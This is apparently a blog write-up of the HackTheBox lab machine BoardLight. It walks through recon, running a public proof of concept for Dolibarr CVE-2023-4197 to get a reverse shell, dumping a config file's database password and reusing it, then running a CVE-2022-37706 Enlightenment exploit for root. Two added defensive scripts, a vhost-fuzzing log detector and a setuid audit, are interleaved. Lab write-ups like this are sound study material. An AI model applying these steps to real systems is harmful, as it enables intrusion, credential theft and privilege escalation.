Hackthebox: BoardLight

Foued SAIDI Lv4

Overview

BoardLight is an easy-difficulty HackTheBox machine. It starts with subdomain enumeration, which reveals a hidden Dolibarr CRM subdomain vulnerable to CVE-2023-4197; database credentials exfiltrated from the CRM's configuration then give us the user flag. For root, we abuse CVE-2022-37706, a local privilege escalation in the Enlightenment window manager.

BoardLight-info-card

Reconnaissance

Nmap

PS C:\Users\0xkujen> nmap -A -Pn 10.129.17.205
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 21:13 W. Central Africa Standard Time
NSOCK ERROR [0.3130s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 10.129.17.205
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
| 256 5903dc52873a359934447433783135fb (ECDSA)
|_ 256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=9/27%OT=22%CT=1%CU=38673%PV=Y%DS=2%DC=T%G=Y%TM=66F711F
OS:F%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW
OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%
OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1
OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 171.00 ms 10.10.16.1
2 171.00 ms 10.129.17.205

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.45 seconds

We can see two open ports: 22 for SSH and 80 for HTTP, which means there is a web application.
We also see the board.htb domain, so we add it to our /etc/hosts file.

Subdomain Enumeration

PS C:\Users\0xkujen\Tools\ffuf> .\ffuf.exe -w ..\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.board.htb" -u "http://10.129.17.205" -mc 200 -fs 15949

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.129.17.205
:: Wordlist : FUZZ: C:\Users\0xkujen\Tools\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
:: Filter : Response size: 15949
________________________________________________

crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 1150ms]

We find a crm subdomain, so we add crm.board.htb to our /etc/hosts as well.
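The ffuf run above sends thousands of requests that differ only in their Host header, which is easy to spot server-side. As an added example (not part of the original writeup), this Python script flags that pattern in Apache access logs; it assumes a custom LogFormat that records the raw %{Host}i header, since the stock vhost_combined format logs the ServerName of the vhost that answered, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed Apache LogFormat (not the writeup's):
#   "%h %l %u %t \"%r\" %>s %O \"%{Host}i\" \"%{User-Agent}i\""
# vhost_combined logs %v, the ServerName of the matching vhost, so every
# fuzzed name would show up as board.htb; the raw %{Host}i header is what
# exposes the fuzzing.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<host>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def detect_vhost_fuzzing(lines, max_hosts=20, window_s=60):
    """Return {ip: distinct Host headers} for clients that requested more
    than max_hosts distinct Host values inside any window_s-second window."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append((rec["ts"], rec["host"].lower()))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while (ts - events[start][0]).total_seconds() > window_s:
                start += 1                      # slide the window forward
            distinct = len({h for _, h in events[start:end + 1]})
            if distinct > max_hosts:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged

# Constructed sample: one client trying 30 candidate subdomains within a
# minute, and one ordinary visitor using the two legitimate names.
def _line(ip, sec, host):
    return (f'{ip} - - [27/Sep/2024:21:15:{sec:02d} +0100] "GET / HTTP/1.1" '
            f'200 15949 "{host}" "Mozilla/5.0"')

SAMPLE_LOG = [_line("10.10.14.5", i, f"sub{i}.board.htb") for i in range(30)]
SAMPLE_LOG += [_line("10.10.14.9", 5, "board.htb"),
               _line("10.10.14.9", 10, "crm.board.htb"),
               _line("10.10.14.9", 15, "board.htb")]
```

Running `detect_vhost_fuzzing(SAMPLE_LOG)` on the sample returns `{'10.10.14.5': 30}`; the ordinary visitor with two names stays under the threshold.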

Web Application - http://crm.board.htb

We are prompted with a Dolibarr login page:

Dolibarr login

Before trying anything, I searched for exploits affecting Dolibarr 17.0.0 and found CVE-2023-4197, an Improper Input Sanitization Vulnerability in Dolibarr's CRM.
I found a really helpful public PoC for it which grants a shell as the user running the web app:

PS C:\Users\0xkujen> python3 .\poc.py http://crm.board.htb admin admin "ls"

===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====

[+] Attempting to authenticate...
[+] Authenticated successfully!
[+] Attempting to create a website...
[+] Created website name: "ef234d8b922543288599715f34155f52"!
[+] Attempting to create a web page...
[+] Created web page name: "4e2cc3180b8d4bcf966cd5a7ad9dd125"!
[+] Attempting to modify the web page...
[+] Web page modified successfully!
[+] Triggering RCE now via: http://crm.board.htb/public/website/index.php?website=ef234d8b922543288599715f34155f52&pageref=4e2cc3180b8d4bcf966cd5a7ad9dd125
[+] RCE successful! Output of command:

index.php
shell.sh
shell.sh.1
styles.css.php
styles.css.php
PS C:\Users\0xkujen> python3 .\poc.py http://crm.board.htb admin admin "bash shell.sh"

===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====

[+] Attempting to authenticate...
[+] Authenticated successfully!
[+] Attempting to create a website...
[+] Created website name: "a01508975cc4466c8a24f59e2994655d"!
[+] Attempting to create a web page...
[+] Created web page name: "148cfdbf321a4f4cbe398addae9c1aa0"!
[+] Attempting to modify the web page...
[+] Web page modified successfully!
[+] Triggering RCE now via: http://crm.board.htb/public/website/index.php?website=a01508975cc4466c8a24f59e2994655d&pageref=148cfdbf321a4f4cbe398addae9c1aa0

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.17.205] 59938
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Now looking for some database files, we stumble upon a conf.php file:

www-data@boardlight:~/html$ find . -name *conf.* 2> /dev/null
find . -name *conf.* 2> /dev/null
./crm.board.htb/nightwatch.conf.js
./crm.board.htb/htdocs/includes/ace/src/snippets/apache_conf.js
./crm.board.htb/htdocs/includes/ace/src/mode-apache_conf.js
./crm.board.htb/htdocs/core/class/conf.class.php
./crm.board.htb/htdocs/install/fileconf.php
./crm.board.htb/htdocs/conf/conf.php.old
./crm.board.htb/htdocs/conf/conf.php.example
./crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
cat ./crm.board.htb/htdocs/conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

Looking at the /home directory, we also find a user larissa; trying the serverfun2$2023!! password on her account works, and we get our user.txt flag:

larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ cat user.txt
3ae390e6867d32******************
larissa@boardlight:~$

Privilege Escalation - CVE-2022-37706

Checking our SUID permissions on files, we find something interesting:

22
larissa@boardlight:~$ find / -perm -4000 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
larissa@boardlight:~$
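An added example (not part of the original writeup) that turns the manual review of such a listing into a repeatable check: it diffs the setuid binaries found against a baseline of those a stock Ubuntu install carries, and reads the Enlightenment version out of the module directory name to flag a pre-0.25.4 enlightenment_sys, the version range CVE-2022-37706 affects. The baseline is an assumption constructed from the listing above, and 0.25.4 as the fixed version is taken from the advisory.

```python
import os
import re
import stat

# Setuid binaries a stock Ubuntu install is expected to carry (assumption:
# built from the writeup's listing with the Enlightenment entries removed).
BASELINE = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/sbin/pppd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/sudo",
    "/usr/bin/su", "/usr/bin/chfn", "/usr/bin/umount", "/usr/bin/gpasswd",
    "/usr/bin/passwd", "/usr/bin/fusermount", "/usr/bin/chsh",
    "/usr/bin/vmware-user-suid-wrapper",
}
# CVE-2022-37706 is fixed in Enlightenment 0.25.4; module directories are
# named <host>-<Enlightenment version>, which reveals the installed version.
E_FIXED = (0, 25, 4)
E_VER_RE = re.compile(r"/enlightenment/modules/[^/]+/[^/]+-(\d+)\.(\d+)\.(\d+)/")

def find_setuid(root="/"):
    """Walk root and return every regular file with the setuid bit set,
    the same data `find / -perm -4000` produces."""
    hits = []
    for dirpath, _, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def enlightenment_version(paths):
    """Recover the Enlightenment version tuple from a module path, or None."""
    for p in paths:
        m = E_VER_RE.search(p)
        if m:
            return tuple(int(x) for x in m.groups())
    return None

def audit(paths, baseline=BASELINE):
    """Return human-readable findings for a list of setuid binaries."""
    findings = [f"unexpected setuid binary: {p}" for p in sorted(set(paths) - baseline)]
    ver = enlightenment_version(paths)
    if ver and ver < E_FIXED and any(p.endswith("/enlightenment_sys") for p in paths):
        findings.append("setuid enlightenment_sys from Enlightenment %d.%d.%d (< 0.25.4): "
                        "CVE-2022-37706" % ver)
    return findings

# The listing from the writeup, reproduced here as the audit's sample input.
WRITEUP_LISTING = sorted(BASELINE | {
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys",
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd",
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight",
    "/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset",
})
```

On a live host, `audit(find_setuid())` gives the same report for whatever is actually installed.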

We see something interesting: Enlightenment, a window manager for Linux.
Looking for known exploits for it, I came across CVE-2022-37706, which allows local users to obtain root privileges by abusing the setuid enlightenment_sys helper in Enlightenment:

larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/root.txt
b95c0c23a589d6******************
#

And we get our root flag. It was a fairly short writeup since it was a straightforward machine. See you in future writeups :)

With love, 0xkujen

  • Title: Hackthebox: BoardLight
  • Author: Foued SAIDI
  • Created at : 2024-09-27 21:04:50
  • Updated at : 2024-10-05 17:32:50
  • Link: https://kujen5.github.io/2024/09/27/Hackthebox-BoardLight/
  • License: This work is licensed under CC BY-NC-SA 4.0.